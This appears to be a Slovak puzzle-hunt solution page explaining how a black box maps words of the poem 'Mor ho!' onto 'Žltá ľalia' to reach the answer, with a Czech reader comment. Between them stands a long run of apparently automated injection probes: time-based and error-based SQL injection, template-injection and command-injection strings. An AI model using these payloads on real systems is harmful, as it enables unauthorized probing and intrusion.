Zadanie tejto šifry sa nachádza na externom serveri.
heslo: ZBROJ
Keďže to vyzerá, že black box má dať na výstupe slovenské slovo, skúsime doň vkladať nejaké slovenské slová. Pri dlhých slovách na väčšinu zrejme dostaneme, že ich nepozná, aj keď napríklad pre vstup heslo dostaneme výstup adam.
Väčšiu úspešnosť majú napríklad krátke slová ako spojky a predložky, tie skoro všetky black box pozná a povie vám na ne odpovede: slová ako moju, zlá, a obzvlášť výherný je napríklad vstup za pre ktorý dostanete výstup ľalija.
Ak ste boli vytrvalí, časom ste si mohli nazbierať dostatočnú množinu možných výstupov na to, aby sa dalo spoznať (alebo ich nasypať do Googlu a tak zistiť), že všetko to sú slová z Bottovej básne Žltá ľalia. Máme teda polovicu hádanky. Čierna skrinka zoberie vstup a nejak z neho vyrobí slovo Žltej ľalie. Ale ako?
Zjavne aj platné vstupy tvorí len nejaká obmedzená množina slov. A keď platné výstupy tvoria nejakú báseň od štúrovcov, je celkom rozumné predpokladať, že aj vstupy by mohli mať podobnú vlastnosť. Od tohto pozorovania sa už pomerne rýchlo dá dostať k zisteniu, že u vstupov ide tentokrát o Chalupkovu báseň Mor ho!
Čierna skrinka prekladá n-té slovo Mor ho! na n-té slovo Žltej ľalie. Stačí si teda v texte Žltej ľalie nájsť kohúta a potom tak od oka nájsť zodpovedajúce miesto v Mor ho! a na pár pokusov doladiť, ktorý je ten správny vstup.
Kohút sa v Žltej ľalii vyskytuje dvakrát, ale kvôli opakujúcim sa slovám v Mor ho! je dosiahnuteľný len jeden z nich. (Ku slovu, ktoré zadáte, sa vždy nájde jeho prvý výskyt.) Existuje teda práve jeden správny vstup: zbroje
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('e',2)='e
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('s',0)='s
123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('q',2)
123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('m',0)
123456'and(select+1)>0waitfor/**/delay'0:0:2
123456'and(select+1)>0waitfor/**/delay'0:0:0
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
(select*from(select+sleep(2)union/**/select+1)a)
(select*from(select+sleep(0)union/**/select+1)a)
123456"and"r"="k
123456"and"x"="x
123456'and'e'='q
123456'and'i'='i
123456/**/and+0=9
123456/**/and+3=3
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
<%- 972773516+980724182 %>
123456
123456
#set($c=808161685+898955488)${c}$c
expr 805154940 + 969618759
123456
123456
${(945795818+800827890)?c}
123456&set /A 881318171+827811350
123456
123456
${892303095+955698047}
123456$(expr 886878630 + 925431782)
123456
123456
/*1*/{{945160533+843973545}}
123456|expr 999246938 + 951812947
123456
123456'"\(
123456
expr 918450108 + 946071603
123456
123456鎈'"\(
123456
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1505074465')))>'0
123456
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1456410642')))
123456
123456/**/and/**/cast(md5('1677799684')as/**/int)>0
123456
123456
123456'and(select'1'from/**/cast(md5(1749117758)as/**/int))>'0
123456
123456
123456
extractvalue(1,concat(char(126),md5(1812265811)))
123456
123456
'-var_dump(md5(274964633))-'
123456
123456
123456"and/**/extractvalue(1,concat(char(126),md5(1830594074)))and"
123456
${850528457+919666579}
123456
${@var_dump(md5(654245758))};
123456
123456
123456'and/**/extractvalue(1,concat(char(126),md5(1042491034)))and'
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
Krasna. Jen teda pro cesky tym najit basen Mor ho! (Google vam na sadu predlozek fakt moc nepovi) byl opravdovy mor.